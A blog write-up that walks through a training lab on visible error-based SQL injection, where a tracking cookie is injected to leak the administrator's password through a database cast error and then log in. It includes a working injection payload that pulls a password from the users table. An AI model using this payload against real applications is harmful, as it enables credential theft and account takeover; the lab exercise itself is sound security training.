13 - Visible error-based SQL injection

This lab contains a SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned.

The database contains a different table called users, with columns called username and password. To solve the lab, find a way to leak the password for the administrator user, then log in to their account.

Given : Injection point(TrackingId), Attack type(Blind), Visible error , Table(users), Columns(username,password)
End goal : Login as administrator user

Initial request looks like -

As it given in the challenge that the vulnerable place is TrackingId, adding ' at the end of TrackingId gives 500 Internal Server Error -

It also gives a visible error in response which is caused by the query -

Now we know that how/where we can find the error response. But there is a character limitation , so we can inject following query to extract the password - 'and CAST((SELECT password FROM users LIMIT 1) AS bool);

Above query tries to convert the password into boolean which cann't be cast so it return the error in response. It gives a password in response -

(Luckly it is the password of administrator. If it would not then we have to extract more rows from the table.)

Goto my account , login into administrator account using above password.

Lab solved :

Prev Next

CAPA: The Basics01/02/25 ctf → thm → capa-the-basics

SQLMap: The Basics31/01/25 ctf → thm → sqlmap-the-basics

SQL Fundamentals31/01/25 ctf → thm → sql-fundamentals

Powershell30/01/25 programming → powershell